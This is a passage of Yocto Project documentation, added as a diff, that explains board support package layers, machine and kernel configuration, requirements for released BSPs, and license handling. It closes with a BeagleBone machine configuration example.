+The exact types of binaries present are highly hardware-dependent. The
+:ref:`README <bsp-guide/bsp:readme file>` file should be present in the
+BSP Layer and it explains how to use the images with the target
+hardware. Additionally, the
+:ref:`README.sources <bsp-guide/bsp:readme.sources file>` file should be
+present to locate the sources used to build the images and provide
+information on the Metadata.
+
+.. _bsp-filelayout-layer:
+
+Layer Configuration File
+------------------------
+
+You can find this file in the BSP Layer at: ::
+
+   meta-bsp_root_name/conf/layer.conf
+
+The ``conf/layer.conf`` file identifies the file structure as a layer,
+identifies the contents of the layer, and contains information about how
+the build system should use it. Generally, a standard boilerplate file
+such as the following works. In the following example, you would replace
+"bsp" with the actual name of the BSP (i.e. "bsp_root_name" from the example
+template). ::
+
+   # We have a conf and classes directory, add to BBPATH
+   BBPATH .= ":${LAYERDIR}"
+
+   # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
+   BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+               ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+   BBFILE_COLLECTIONS += "bsp"
+   BBFILE_PATTERN_bsp = "^${LAYERDIR}/"
+   BBFILE_PRIORITY_bsp = "6"
+   LAYERDEPENDS_bsp = "intel"
+
+To illustrate the string substitutions, here are the corresponding
+statements from the Raspberry Pi ``conf/layer.conf`` file: ::
+
+   # We have a conf and classes directory, append to BBPATH
+   BBPATH .= ":${LAYERDIR}"
+
+   # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
+   BBFILES += "${LAYERDIR}/recipes*/*/*.bb \
+               ${LAYERDIR}/recipes*/*/*.bbappend"
+
+   BBFILE_COLLECTIONS += "raspberrypi"
+   BBFILE_PATTERN_raspberrypi := "^${LAYERDIR}/"
+   BBFILE_PRIORITY_raspberrypi = "9"
+
+   # Additional license directories.
+   LICENSE_PATH += "${LAYERDIR}/files/custom-licenses"
+   .
+   .
+   .
+
+This file simply makes :term:`BitBake` aware of the recipes and configuration
+directories. The file must exist so that the OpenEmbedded build system can
+recognize the BSP.
+
+.. _bsp-filelayout-machine:
+
+Hardware Configuration Options
+------------------------------
+
+You can find these files in the BSP Layer at: ::
+
+   meta-bsp_root_name/conf/machine/*.conf
+
+The machine files bind together all the information contained elsewhere
+in the BSP into a format that the build system can understand. Each BSP
+Layer requires at least one machine file. If the BSP supports multiple
+machines, multiple machine configuration files can exist. These
+filenames correspond to the values to which users have set the
+:term:`MACHINE` variable.
+
+These files define things such as the kernel package to use
+(:term:`PREFERRED_PROVIDER` of
+:ref:`virtual/kernel <dev-manual/dev-manual-common-tasks:using virtual providers>`),
+the hardware drivers to include in different types of images, any
+special software components that are needed, any bootloader information,
+and also any special image format requirements.
+
+This configuration file could also include a hardware "tuning" file that
+is commonly used to define the package architecture and specify
+optimization flags, which are carefully chosen to give best performance
+on a given processor.
+
+Tuning files are found in the ``meta/conf/machine/include`` directory
+within the :term:`Source Directory`.
+For example, many ``tune-*`` files (e.g. ``tune-arm1136jf-s.inc``,
+``tune-1586-nlp.inc``, and so forth) reside in the
+``poky/meta/conf/machine/include`` directory.
+
+To use an include file, you simply include them in the machine
+configuration file. For example, the Raspberry Pi BSP
+``raspberrypi3.conf`` contains the following statement: ::
+
+   include conf/machine/include/rpi-base.inc
+
+.. _bsp-filelayout-misc-recipes:
+
+Miscellaneous BSP-Specific Recipe Files
+---------------------------------------
+
+You can find these files in the BSP Layer at: ::
+
+   meta-bsp_root_name/recipes-bsp/*
+
+This optional directory contains miscellaneous recipe files for the BSP.
+Most notably would be the formfactor files. For example, in the
+Raspberry Pi BSP, there is the ``formfactor_0.0.bbappend`` file, which
+is an append file used to augment the recipe that starts the build.
+Furthermore, there are machine-specific settings used during the build
+that are defined by the ``machconfig`` file further down in the
+directory. Here is the ``machconfig`` file for the Raspberry Pi BSP: ::
+
+   HAVE_TOUCHSCREEN=0
+   HAVE_KEYBOARD=1
+
+   DISPLAY_CAN_ROTATE=0
+   DISPLAY_ORIENTATION=0
+   DISPLAY_DPI=133
+
+.. note::
+
+   If a BSP does not have a formfactor entry, defaults are established
+   according to the formfactor configuration file that is installed by
+   the main formfactor recipe
+   ``meta/recipes-bsp/formfactor/formfactor_0.0.bb``, which is found in
+   the :term:`Source Directory`.
+
+.. _bsp-filelayout-recipes-graphics:
+
+Display Support Files
+---------------------
+
+You can find these files in the BSP Layer at: ::
+
+   meta-bsp_root_name/recipes-graphics/*
+
+This optional directory contains recipes for the BSP if it has special
+requirements for graphics support. All files that are needed for the BSP
+to support a display are kept here.
+
+.. _bsp-filelayout-kernel:
+
+Linux Kernel Configuration
+--------------------------
+
+You can find these files in the BSP Layer at: ::
+
+   meta-bsp_root_name/recipes-kernel/linux/linux*.bbappend
+   meta-bsp_root_name/recipes-kernel/linux/*.bb
+
+Append files (``*.bbappend``) modify the main kernel recipe being used
+to build the image. The ``*.bb`` files would be a developer-supplied
+kernel recipe. This area of the BSP hierarchy can contain both these
+types of files although, in practice, it is likely that you would have
+one or the other.
+
+For your BSP, you typically want to use an existing Yocto Project kernel
+recipe found in the :term:`Source Directory`
+at
+``meta/recipes-kernel/linux``. You can append machine-specific changes
+to the kernel recipe by using a similarly named append file, which is
+located in the BSP Layer for your target device (e.g. the
+``meta-bsp_root_name/recipes-kernel/linux`` directory).
+
+Suppose you are using the ``linux-yocto_4.4.bb`` recipe to build the
+kernel. In other words, you have selected the kernel in your
+``"bsp_root_name".conf`` file by adding
+:term:`PREFERRED_PROVIDER` and :term:`PREFERRED_VERSION`
+statements as follows: ::
+
+   PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+   PREFERRED_VERSION_linux-yocto ?= "4.4%"
+
+.. note::
+
+   When the preferred provider is assumed by default, the ``PREFERRED_PROVIDER``
+   statement does not appear in the ``"bsp_root_name".conf`` file.
+
+You would use the ``linux-yocto_4.4.bbappend`` file to append specific
+BSP settings to the kernel, thus configuring the kernel for your
+particular BSP.
+
+You can find more information on what your append file should contain in
+the ":ref:`kernel-dev/kernel-dev-common:creating the append file`" section
+in the Yocto Project Linux Kernel Development Manual.
+
+An alternate scenario is when you create your own kernel recipe for the
+BSP. A good example of this is the Raspberry Pi BSP. If you examine the
+``recipes-kernel/linux`` directory you see the following: ::
+
+   linux-raspberrypi-dev.bb
+   linux-raspberrypi.inc
+   linux-raspberrypi_4.14.bb
+   linux-raspberrypi_4.9.bb
+
+The directory contains three kernel recipes and a common include file.
+
+Developing a Board Support Package (BSP)
+========================================
+
+This section describes the high-level procedure you can follow to create
+a BSP. Although not required for BSP creation, the ``meta-intel``
+repository, which contains many BSPs supported by the Yocto Project, is
+part of the example.
+
+For an example that shows how to create a new layer using the tools, see
+the ":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section.
+
+The following illustration and list summarize the BSP creation general
+workflow.
+
+.. image:: figures/bsp-dev-flow.png
+   :align: center
+
+#. *Set up Your Host Development System to Support Development Using the
+   Yocto Project*: See the ":ref:`dev-manual/dev-manual-start:preparing the build host`"
+   section in the Yocto Project Development Tasks Manual for options on how to
+   get a system ready to use the Yocto Project.
+
+#. *Establish the meta-intel Repository on Your System:* Having
+   local copies of these supported BSP layers on your system gives you
+   access to layers you might be able to leverage when creating your
+   BSP. For information on how to get these files, see the
+   ":ref:`bsp-guide/bsp:preparing your build host to work with bsp layers`"
+   section.
+
+#. *Create Your Own BSP Layer Using the bitbake-layers Script:*
+   Layers are ideal for isolating and storing work for a given piece of
+   hardware. A layer is really just a location or area in which you
+   place the recipes and configurations for your BSP. In fact, a BSP is,
+   in itself, a special type of layer. The simplest way to create a new
+   BSP layer that is compliant with the Yocto Project is to use the
+   ``bitbake-layers`` script. For information about that script, see the
+   ":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+   section.
+
+   Another example that illustrates a layer is an application. Suppose
+   you are creating an application that has library or other
+   dependencies in order for it to compile and run. The layer, in this
+   case, would be where all the recipes that define those dependencies
+   are kept. The key point for a layer is that it is an isolated area
+   that contains all the relevant information for the project that the
+   OpenEmbedded build system knows about. For more information on
+   layers, see the ":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+   section in the Yocto Project Overview and Concepts Manual. You can also
+   reference the ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+   section in the Yocto Project Development Tasks Manual. For more
+   information on BSP layers, see the ":ref:`bsp-guide/bsp:bsp layers`"
+   section.
+
+   .. note::
+
+      -  Four hardware reference BSPs exist that are part of the Yocto
+         Project release and are located in the ``poky/meta-yocto-bsp``
+         BSP layer:
+
+         -  Texas Instruments Beaglebone (``beaglebone-yocto``)
+
+         -  Ubiquiti Networks EdgeRouter Lite (``edgerouter``)
+
+         -  Two general IA platforms (``genericx86`` and ``genericx86-64``)
+
+      -  Three core Intel BSPs exist as part of the Yocto Project
+         release in the ``meta-intel`` layer:
+
+         -  ``intel-core2-32``, which is a BSP optimized for the Core2
+            family of CPUs as well as all CPUs prior to the Silvermont
+            core.
+
+         -  ``intel-corei7-64``, which is a BSP optimized for Nehalem
+            and later Core and Xeon CPUs as well as Silvermont and later
+            Atom CPUs, such as the Baytrail SoCs.
+
+         -  ``intel-quark``, which is a BSP optimized for the Intel
+            Galileo gen1 & gen2 development boards.
+
+   When you set up a layer for a new BSP, you should follow a standard
+   layout. This layout is described in the ":ref:`bsp-guide/bsp:example filesystem layout`"
+   section. In the standard layout, notice
+   the suggested structure for recipes and configuration information.
+   You can see the standard layout for a BSP by examining any supported
+   BSP found in the ``meta-intel`` layer inside the Source Directory.
+
+#. *Make Configuration Changes to Your New BSP Layer:* The standard BSP
+   layer structure organizes the files you need to edit in ``conf`` and
+   several ``recipes-*`` directories within the BSP layer. Configuration
+   changes identify where your new layer is on the local system and
+   identifies the kernel you are going to use. When you run the
+   ``bitbake-layers`` script, you are able to interactively configure
+   many things for the BSP (e.g. keyboard, touchscreen, and so forth).
+
+#. *Make Recipe Changes to Your New BSP Layer:* Recipe changes include
+   altering recipes (``*.bb`` files), removing recipes you do not use,
+   and adding new recipes or append files (``.bbappend``) that support
+   your hardware.
+
+#. *Prepare for the Build:* Once you have made all the changes to your
+   BSP layer, there remains a few things you need to do for the
+   OpenEmbedded build system in order for it to create your image. You
+   need to get the build environment ready by sourcing an environment
+   setup script (i.e. ``oe-init-build-env``) and you need to be sure two
+   key configuration files are configured appropriately: the
+   ``conf/local.conf`` and the ``conf/bblayers.conf`` file. You must
+   make the OpenEmbedded build system aware of your new layer. See the
+   ":ref:`dev-manual/dev-manual-common-tasks:enabling your layer`"
+   section in the Yocto Project Development Tasks Manual for information
+   on how to let the build system know about your new layer.
+
+#. *Build the Image:* The OpenEmbedded build system uses the BitBake
+   tool to build images based on the type of image you want to create.
+   You can find more information about BitBake in the
+   :doc:`BitBake User Manual <bitbake:index>`.
+
+   The build process supports several types of images to satisfy
+   different needs. See the
+   ":ref:`ref-manual/ref-images:Images`" chapter in the Yocto
+   Project Reference Manual for information on supported images.
+
+Requirements and Recommendations for Released BSPs
+==================================================
+
+Certain requirements exist for a released BSP to be considered compliant
+with the Yocto Project. Additionally, recommendations also exist. This
+section describes the requirements and recommendations for released
+BSPs.
+
+Released BSP Requirements
+-------------------------
+
+Before looking at BSP requirements, you should consider the following:
+
+-  The requirements here assume the BSP layer is a well-formed, "legal"
+   layer that can be added to the Yocto Project. For guidelines on
+   creating a layer that meets these base requirements, see the
+   ":ref:`bsp-guide/bsp:bsp layers`" section in this manual and the
+   ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  The requirements in this section apply regardless of how you package
+   a BSP. You should consult the packaging and distribution guidelines
+   for your specific release process. For an example of packaging and
+   distribution requirements, see the ":yocto_wiki:`Third Party BSP Release
+   Process </wiki/Third_Party_BSP_Release_Process>`"
+   wiki page.
+
+-  The requirements for the BSP as it is made available to a developer
+   are completely independent of the released form of the BSP. For
+   example, the BSP Metadata can be contained within a Git repository
+   and could have a directory structure completely different from what
+   appears in the officially released BSP layer.
+
+-  It is not required that specific packages or package modifications
+   exist in the BSP layer, beyond the requirements for general
+   compliance with the Yocto Project. For example, no requirement exists
+   dictating that a specific kernel or kernel version be used in a given
+   BSP.
+
+Following are the requirements for a released BSP that conform to the
+Yocto Project:
+
+-  *Layer Name:* The BSP must have a layer name that follows the Yocto
+   Project standards. For information on BSP layer names, see the
+   ":ref:`bsp-guide/bsp:bsp layers`" section.
+
+-  *File System Layout:* When possible, use the same directory names in
+   your BSP layer as listed in the ``recipes.txt`` file, which is found
+   in ``poky/meta`` directory of the :term:`Source Directory`
+   or in the OpenEmbedded-Core Layer (``openembedded-core``) at
+   https://git.openembedded.org/openembedded-core/tree/meta.
+
+   You should place recipes (``*.bb`` files) and recipe modifications
+   (``*.bbappend`` files) into ``recipes-*`` subdirectories by
+   functional area as outlined in ``recipes.txt``. If you cannot find a
+   category in ``recipes.txt`` to fit a particular recipe, you can make
+   up your own ``recipes-*`` subdirectory.
+
+   Within any particular ``recipes-*`` category, the layout should match
+   what is found in the OpenEmbedded-Core Git repository
+   (``openembedded-core``) or the Source Directory (``poky``). In other
+   words, make sure you place related files in appropriately-related
+   ``recipes-*`` subdirectories specific to the recipe's function, or
+   within a subdirectory containing a set of closely-related recipes.
+   The recipes themselves should follow the general guidelines for
+   recipes used in the Yocto Project found in the "`OpenEmbedded Style
+   Guide <http://openembedded.org/wiki/Styleguide>`__".
+
+-  *License File:* You must include a license file in the
+   ``meta-bsp_root_name`` directory. This license covers the BSP
+   Metadata as a whole. You must specify which license to use since no
+   default license exists when one is not specified. See the
+   :yocto_git:`COPYING.MIT </cgit.cgi/meta-raspberrypi/tree/COPYING.MIT>`
+   file for the Raspberry Pi BSP in the ``meta-raspberrypi`` BSP layer
+   as an example.
+
+-  *README File:* You must include a ``README`` file in the
+   ``meta-bsp_root_name`` directory. See the
+   :yocto_git:`README.md </cgit.cgi/meta-raspberrypi/tree/README.md>`
+   file for the Raspberry Pi BSP in the ``meta-raspberrypi`` BSP layer
+   as an example.
+
+   At a minimum, the ``README`` file should contain the following:
+
+   -  A brief description of the target hardware.
+
+   -  A list of all the dependencies of the BSP. These dependencies are
+      typically a list of required layers needed to build the BSP.
+      However, the dependencies should also contain information
+      regarding any other dependencies the BSP might have.
+
+   -  Any required special licensing information. For example, this
+      information includes information on special variables needed to
+      satisfy a EULA, or instructions on information needed to build or
+      distribute binaries built from the BSP Metadata.
+
+   -  The name and contact information for the BSP layer maintainer.
+      This is the person to whom patches and questions should be sent.
+      For information on how to find the right person, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+      section in the Yocto Project Development Tasks Manual.
+
+   -  Instructions on how to build the BSP using the BSP layer.
+
+   -  Instructions on how to boot the BSP build from the BSP layer.
+
+   -  Instructions on how to boot the binary images contained in the
+      ``binary`` directory, if present.
+
+   -  Information on any known bugs or issues that users should know
+      about when either building or booting the BSP binaries.
+
+-  *README.sources File:* If your BSP contains binary images in the
+   ``binary`` directory, you must include a ``README.sources`` file in
+   the ``meta-bsp_root_name`` directory. This file specifies exactly
+   where you can find the sources used to generate the binary images.
+
+-  *Layer Configuration File:* You must include a ``conf/layer.conf``
+   file in the ``meta-bsp_root_name`` directory. This file identifies
+   the ``meta-bsp_root_name`` BSP layer as a layer to the build
+   system.
+
+-  *Machine Configuration File:* You must include one or more
+   ``conf/machine/bsp_root_name.conf`` files in the
+   ``meta-bsp_root_name`` directory. These configuration files define
+   machine targets that can be built using the BSP layer. Multiple
+   machine configuration files define variations of machine
+   configurations that the BSP supports. If a BSP supports multiple
+   machine variations, you need to adequately describe each variation in
+   the BSP ``README`` file. Do not use multiple machine configuration
+   files to describe disparate hardware. If you do have very different
+   targets, you should create separate BSP layers for each target.
+
+   .. note::
+
+      It is completely possible for a developer to structure the working
+      repository as a conglomeration of unrelated BSP files, and to possibly
+      generate BSPs targeted for release from that directory using scripts or
+      some other mechanism (e.g.  ``meta-yocto-bsp`` layer). Such considerations
+      are outside the scope of this document.
+
+Released BSP Recommendations
+----------------------------
+
+Following are recommendations for released BSPs that conform to the
+Yocto Project:
+
+-  *Bootable Images:* Released BSPs can contain one or more bootable
+   images. Including bootable images allows users to easily try out the
+   BSP using their own hardware.
+
+   In some cases, it might not be convenient to include a bootable
+   image. If so, you might want to make two versions of the BSP
+   available: one that contains binary images, and one that does not.
+   The version that does not contain bootable images avoids unnecessary
+   download times for users not interested in the images.
+
+   If you need to distribute a BSP and include bootable images or build
+   kernel and filesystems meant to allow users to boot the BSP for
+   evaluation purposes, you should put the images and artifacts within a
+   ``binary/`` subdirectory located in the ``meta-bsp_root_name``
+   directory.
+
+   .. note::
+
+      If you do include a bootable image as part of the BSP and the
+      image was built by software covered by the GPL or other open
+      source licenses, it is your responsibility to understand and meet
+      all licensing requirements, which could include distribution of
+      source files.
+
+-  *Use a Yocto Linux Kernel:* Kernel recipes in the BSP should be based
+   on a Yocto Linux kernel. Basing your recipes on these kernels reduces
+   the costs for maintaining the BSP and increases its scalability. See
+   the ``Yocto Linux Kernel`` category in the
+   :yocto_git:`Source Repositories <>` for these kernels.
+
+Customizing a Recipe for a BSP
+==============================
+
+If you plan on customizing a recipe for a particular BSP, you need to do
+the following:
+
+-  Create a ``*.bbappend`` file for the modified recipe. For information on using
+   append files, see the ":ref:`dev-manual/dev-manual-common-tasks:using
+   .bbappend files in your layer`" section in the Yocto Project Development
+   Tasks Manual.
+
+-  Ensure your directory structure in the BSP layer that supports your
+   machine is such that the OpenEmbedded build system can find it. See
+   the example later in this section for more information.
+
+-  Put the append file in a directory whose name matches the machine's
+   name and is located in an appropriate sub-directory inside the BSP
+   layer (i.e. ``recipes-bsp``, ``recipes-graphics``, ``recipes-core``,
+   and so forth).
+
+-  Place the BSP-specific files in the proper directory inside the BSP
+   layer. How expansive the layer is affects where you must place these
+   files. For example, if your layer supports several different machine
+   types, you need to be sure your layer's directory structure includes
+   hierarchy that separates the files according to machine. If your
+   layer does not support multiple machines, the layer would not have
+   that additional hierarchy and the files would obviously not be able
+   to reside in a machine-specific directory.
+
+Following is a specific example to help you better understand the
+process. This example customizes customizes a recipe by adding a
+BSP-specific configuration file named ``interfaces`` to the
+``init-ifupdown_1.0.bb`` recipe for machine "xyz" where the BSP layer
+also supports several other machines:
+
+#. Edit the ``init-ifupdown_1.0.bbappend`` file so that it contains the
+   following: ::
+
+      FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
+
+   The append file needs to be in the ``meta-xyz/recipes-core/init-ifupdown``
+   directory.
+
+#. Create and place the new ``interfaces`` configuration file in the
+   BSP's layer here: ::
+
+      meta-xyz/recipes-core/init-ifupdown/files/xyz-machine-one/interfaces
+
+   .. note::
+
+      If the ``meta-xyz`` layer did not support multiple machines, you would place
+      the interfaces configuration file in the layer here: ::
+
+         meta-xyz/recipes-core/init-ifupdown/files/interfaces
+
+   The :term:`FILESEXTRAPATHS` variable in the append files extends the search
+   path the build system uses to find files during the build. Consequently, for
+   this example you need to have the ``files`` directory in the same location as
+   your append file.
+
+BSP Licensing Considerations
+============================
+
+In some cases, a BSP contains separately-licensed Intellectual Property
+(IP) for a component or components. For these cases, you are required to
+accept the terms of a commercial or other type of license that requires
+some kind of explicit End User License Agreement (EULA). Once you accept
+the license, the OpenEmbedded build system can then build and include
+the corresponding component in the final BSP image. If the BSP is
+available as a pre-built image, you can download the image after
+agreeing to the license or EULA.
+
+You could find that some separately-licensed components that are
+essential for normal operation of the system might not have an
+unencumbered (or free) substitute. Without these essential components,
+the system would be non-functional. Then again, you might find that
+other licensed components that are simply 'good-to-have' or purely
+elective do have an unencumbered, free replacement component that you
+can use rather than agreeing to the separately-licensed component. Even
+for components essential to the system, you might find an unencumbered
+component that is not identical but will work as a less-capable version
+of the licensed version in the BSP recipe.
+
+For cases where you can substitute a free component and still maintain
+the system's functionality, the "DOWNLOADS" selection from the
+"SOFTWARE" tab on the :yocto_home:`Yocto Project Website <>` makes
+available de-featured BSPs that are completely free of any IP
+encumbrances. For these cases, you can use the substitution directly and
+without any further licensing requirements. If present, these fully
+de-featured BSPs are named appropriately different as compared to the
+names of their respective encumbered BSPs. If available, these
+substitutions are your simplest and most preferred options. Obviously,
+use of these substitutions assumes the resulting functionality meets
+system requirements.
+
+.. note::
+
+   If however, a non-encumbered version is unavailable or it provides
+   unsuitable functionality or quality, you can use an encumbered
+   version.
+
+A couple different methods exist within the OpenEmbedded build system to
+satisfy the licensing requirements for an encumbered BSP. The following
+list describes them in order of preference:
+
+#. *Use the LICENSE_FLAGS Variable to Define the Recipes that Have Commercial or
+   Other Types of Specially-Licensed Packages:* For each of those recipes, you can
+   specify a matching license string in a ``local.conf`` variable named
+   :term:`LICENSE_FLAGS_WHITELIST`.
+   Specifying the matching license string signifies that you agree to
+   the license. Thus, the build system can build the corresponding
+   recipe and include the component in the image. See the
+   ":ref:`dev-manual/dev-manual-common-tasks:enabling commercially licensed recipes`"
+   section in the Yocto Project Development Tasks Manual for details on
+   how to use these variables.
+
+   If you build as you normally would, without specifying any recipes in
+   the ``LICENSE_FLAGS_WHITELIST``, the build stops and provides you
+   with the list of recipes that you have tried to include in the image
+   that need entries in the ``LICENSE_FLAGS_WHITELIST``. Once you enter
+   the appropriate license flags into the whitelist, restart the build
+   to continue where it left off. During the build, the prompt will not
+   appear again since you have satisfied the requirement.
+
+   Once the appropriate license flags are on the white list in the
+   ``LICENSE_FLAGS_WHITELIST`` variable, you can build the encumbered
+   image with no change at all to the normal build process.
+
+#. *Get a Pre-Built Version of the BSP:* You can get this type of BSP by
+   selecting the "DOWNLOADS" item from the "SOFTWARE" tab on the
+   :yocto_home:`Yocto Project website <>`. You can download BSP tarballs
+   that contain proprietary components after agreeing to the licensing
+   requirements of each of the individually encumbered packages as part
+   of the download process. Obtaining the BSP this way allows you to
+   access an encumbered image immediately after agreeing to the
+   click-through license agreements presented by the website. If you
+   want to build the image yourself using the recipes contained within
+   the BSP tarball, you will still need to create an appropriate
+   ``LICENSE_FLAGS_WHITELIST`` to match the encumbered recipes in the
+   BSP.
+
+.. note::
+
+   Pre-compiled images are bundled with a time-limited kernel that runs
+   for a predetermined amount of time (10 days) before it forces the
+   system to reboot. This limitation is meant to discourage direct
+   redistribution of the image. You must eventually rebuild the image if
+   you want to remove this restriction.
+
+Creating a new BSP Layer Using the ``bitbake-layers`` Script
+============================================================
+
+The ``bitbake-layers create-layer`` script automates creating a BSP
+layer. What makes a layer a "BSP layer" is the presence of at least one
+machine configuration file. Additionally, a BSP layer usually has a
+kernel recipe or an append file that leverages off an existing kernel
+recipe. The primary requirement, however, is the machine configuration.
+
+Use these steps to create a BSP layer:
+
+-  *Create a General Layer:* Use the ``bitbake-layers`` script with the
+   ``create-layer`` subcommand to create a new general layer. For
+   instructions on how to create a general layer using the
+   ``bitbake-layers`` script, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *Create a Layer Configuration File:* Every layer needs a layer
+   configuration file. This configuration file establishes locations for
+   the layer's recipes, priorities for the layer, and so forth. You can
+   find examples of ``layer.conf`` files in the Yocto Project
+   :yocto_git:`Source Repositories <>`. To get examples of what you need
+   in your configuration file, locate a layer (e.g. "meta-ti") and
+   examine the
+   :yocto_git:`local.conf </cgit/cgit.cgi/meta-ti/tree/conf/layer.conf>`
+   file.
+
+-  *Create a Machine Configuration File:* Create a
+   ``conf/machine/bsp_root_name.conf`` file. See
+   :yocto_git:`meta-yocto-bsp/conf/machine </cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf/machine>`
+   for sample ``bsp_root_name.conf`` files. Other samples such as
+   :yocto_git:`meta-ti </cgit/cgit.cgi/meta-ti/tree/conf/machine>`
+   and
+   :yocto_git:`meta-freescale </cgit/cgit.cgi/meta-freescale/tree/conf/machine>`
+   exist from other vendors that have more specific machine and tuning
+   examples.
+
+-  *Create a Kernel Recipe:* Create a kernel recipe in
+   ``recipes-kernel/linux`` by either using a kernel append file or a
+   new custom kernel recipe file (e.g. ``yocto-linux_4.12.bb``). The BSP
+   layers mentioned in the previous step also contain different kernel
+   examples. See the ":ref:`kernel-dev/kernel-dev-common:modifying an existing recipe`"
+   section in the Yocto Project Linux Kernel Development Manual for
+   information on how to create a custom kernel.
+
+The remainder of this section provides a description of the Yocto
+Project reference BSP for Beaglebone, which resides in the
+:yocto_git:`meta-yocto-bsp </cgit/cgit.cgi/poky/tree/meta-yocto-bsp>`
+layer.
+
+BSP Layer Configuration Example
+-------------------------------
+
+The layer's ``conf`` directory contains the ``layer.conf`` configuration
+file. In this example, the ``conf/layer.conf`` is the following: ::
+
+   # We have a conf and classes directory, add to BBPATH
+   BBPATH .= ":${LAYERDIR}"
+
+   # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
+   BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+               ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+   BBFILE_COLLECTIONS += "yoctobsp"
+   BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
+   BBFILE_PRIORITY_yoctobsp = "5"
+   LAYERVERSION_yoctobsp = "4"
+   LAYERSERIES_COMPAT_yoctobsp = "&DISTRO_NAME_NO_CAP;"
+
+The variables used in this file configure the layer. A good way to learn about layer
+configuration files is to examine various files for BSP from the
+:yocto_git:`Source Repositories <>`.
+
+For a detailed description of this particular layer configuration file,
+see ":ref:`step 3 <dev-manual/dev-manual-common-tasks:creating your own layer>`"
+in the discussion that describes how to create layers in the Yocto
+Project Development Tasks Manual.
+
+BSP Machine Configuration Example
+---------------------------------
+
+As mentioned earlier in this section, the existence of a machine
+configuration file is what makes a layer a BSP layer as compared to a
+general or kernel layer.
+
+One or more machine configuration files exist in the
+``bsp_layer/conf/machine/`` directory of the layer: ::
+
+   bsp_layer/conf/machine/machine1\.conf
+   bsp_layer/conf/machine/machine2\.conf
+   bsp_layer/conf/machine/machine3\.conf
+   ... more ...
+
+For example, the machine configuration file for the `BeagleBone and
+BeagleBone Black development boards <https://beagleboard.org/bone>`__ is
+located in the layer ``poky/meta-yocto-bsp/conf/machine`` and is named
+``beaglebone-yocto.conf``: ::
+
+   #@TYPE: Machine
+   #@NAME: Beaglebone-yocto machine
+   #@DESCRIPTION: Reference machine configuration for http://beagleboard.org/bone and http://beagleboard.org/black boards
+
+   PREFERRED_PROVIDER_virtual/xserver ?= "xserver-xorg"
+   XSERVER ?= "xserver-xorg \
+               xf86-video-modesetting \
+              "
+
+   MACHINE_EXTRA_RRECOMMENDS = "kernel-modules kernel-devicetree"
+
+   EXTRA_IMAGEDEPENDS += "u-boot"
+
+   DEFAULTTUNE ?= "cortexa8hf-neon"
+   include conf/machine/include/tune-cortexa8.inc
+
+   IMAGE_FSTYPES += "tar.bz2 jffs2 wic wic.bmap"
+   EXTRA_IMAGECMD_jffs2 = "-lnp "
+   WKS_FILE ?= "beaglebone-yocto.wks"
+   IMAGE_INSTALL_append = " kernel-devicetree kernel-image-zimage"
+   do_image_wic[depends] += "mtools-native:do_populate_sysroot dosfstools-native:do_populate_sysroot"
+
+   SERIAL_CONSOLES ?= "115200;ttyS0 115200;ttyO0"
+   SERIAL_CONSOLES_CHECK = "${SERIAL_CONSOLES}"
+
+   PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+   PREFERRED_VERSION_linux-yocto ?= "5.0%"
+
+   KERNEL_IMAGETYPE = "zImage"
+   KERNEL_DEVICETREE = "am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
+   KERNEL_EXTRA_ARGS += "LOADADDR=${UBOOT_ENTRYPOINT}"
+
+   SPL_BINARY = "MLO"
+   UBOOT_SUFFIX = "img"
+   UBOOT_MACHINE = "am335x_evm_defconfig"
+   UBOOT_ENTRYPOINT = "0x80008000"
+   UBOOT_LOADADDRESS = "0x80008000"
+
+   MACHINE_FEATURES = "usbgadget usbhost vfat alsa"
+
+   IMAGE_BOOT_FILES ?= "u-boot.${UBOOT_SUFFIX} MLO zImage am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
+
+The variables used to configure the machine define machine-specific properties; for
+example, machine-dependent packages, machine tunings, the type of kernel
+to build, and U-Boot configurations.
+
+The following list provides some explanation for the statements found in
+the example reference machine configuration file for the BeagleBone
+development boards. Realize that much more can be defined as part of a
+machine's configuration file. In general, you can learn about related
+variables that this example does not have by locating the variables in
+the ":ref:`ref-manual/ref-variables:variables glossary`" in the Yocto
+Project Reference Manual.
+
+-  :term:`PREFERRED_PROVIDER_virtual/xserver <PREFERRED_PROVIDER>`:
+   The recipe that provides "virtual/xserver" when more than one
+   provider is found. In this case, the recipe that provides
+   "virtual/xserver" is "xserver-xorg", which exists in
+   ``poky/meta/recipes-graphics/xorg-xserver``.
+
+-  :term:`XSERVER`: The packages that
+   should be installed to provide an X server and drivers for the
+   machine. In this example, the "xserver-xorg" and
+   "xf86-video-modesetting" are installed.
+
+-  :term:`MACHINE_EXTRA_RRECOMMENDS`:
+   A list of machine-dependent packages not essential for booting the
+   image. Thus, the build does not fail if the packages do not exist.
+   However, the packages are required for a fully-featured image.
+
+   .. tip::
+
+      Many ``MACHINE*`` variables exist that help you configure a particular piece
+      of hardware.
+
+-  :term:`EXTRA_IMAGEDEPENDS`:
+   Recipes to build that do not provide packages for installing into the
+   root filesystem but building the image depends on the recipes.
+   Sometimes a recipe is required to build the final image but is not
+   needed in the root filesystem. In this case, the U-Boot recipe must
+   be built for the image.
+
+-  :term:`DEFAULTTUNE`: Machines
+   use tunings to optimize machine, CPU, and application performance.
+   These features, which are collectively known as "tuning features",
